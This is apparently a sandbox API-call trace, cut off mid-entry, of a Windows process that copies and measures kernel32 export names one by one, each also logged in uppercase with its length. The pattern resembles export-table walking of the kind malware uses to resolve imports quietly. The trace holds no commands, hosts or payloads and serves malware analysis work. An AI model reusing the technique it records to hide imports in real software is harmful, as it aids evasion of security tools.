lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0181.621] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0181.621] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0181.621] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0181.621] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0181.621] lstrlenA (lpString="ADDATOMA") returned 8 [0181.621] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0181.621] lstrlenA (lpString="ADDATOMW") returned 8 [0181.621] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0181.621] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0181.621] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0181.621] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0181.621] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0181.621] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0181.621] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0181.621] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0181.621] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0181.621] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0181.621] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0181.622] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0181.622] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0181.622] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0181.622] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0181.622] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0181.622] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0181.622] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0181.622] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0181.622] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0181.622] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0181.622] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0181.622] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0181.622] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0181.622] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0181.622] lstrlenA (lpString="BACKUPREAD") returned 10 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0181.622] lstrlenA (lpString="BACKUPSEEK") returned 10 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0181.622] lstrlenA (lpString="BACKUPWRITE") returned 11 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0181.622] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0181.622] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0181.623] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0181.623] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0181.623] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0181.623] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0181.623] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0181.623] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0181.623] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0181.623] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0181.623] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0181.623] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0181.623] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0181.623] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0181.623] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0181.623] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0181.623] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0181.623] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0181.623] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0181.623] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0181.623] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0181.624] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0181.624] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0181.626] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0181.626] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0181.626] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0181.626] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0181.626] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0181.626] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0181.626] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0181.626] lstrlenA (lpString="BEEP") returned 4 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0181.626] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0181.626] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0181.626] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0181.626] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0181.626] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0181.626] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0181.626] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0181.626] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0181.626] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0181.626] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0181.626] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0181.627] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0181.627] lstrlenA (lpString="CANCELIO") returned 8 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0181.627] lstrlenA (lpString="CANCELIOEX") returned 10 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0181.627] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0181.627] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0181.627] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0181.627] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0181.627] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0181.627] lstrlenA (lpString="CHECKELEVATION") returned 14 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0181.627] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0181.627] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0181.627] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0181.627] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0181.627] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0181.627] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0181.627] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0181.627] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0181.627] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0181.627] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0181.627] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0181.628] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0181.628] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0181.628] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0181.628] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0181.628] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0181.628] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0181.628] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0181.628] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0181.628] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0181.628] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0181.628] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0181.628] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0181.628] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0181.628] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0181.628] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0181.628] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0181.628] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0181.628] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0181.628] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0181.628] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0181.629] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0181.629] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0181.629] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0181.629] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0181.629] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0181.629] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0181.629] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0181.629] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0181.629] lstrlenA (lpString="COPYCONTEXT") returned 11 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0181.629] lstrlenA (lpString="COPYFILEA") returned 9 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0181.629] lstrlenA (lpString="COPYFILEEXA") returned 11 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0181.629] lstrlenA (lpString="COPYFILEEXW") returned 11 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0181.629] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0181.629] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0181.629] lstrlenA (lpString="COPYFILEW") returned 9 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0181.629] lstrlenA (lpString="COPYLZFILE") returned 10 [0181.629] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0181.629] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0181.630] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0181.630] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0181.630] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0181.630] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0181.630] lstrlenA 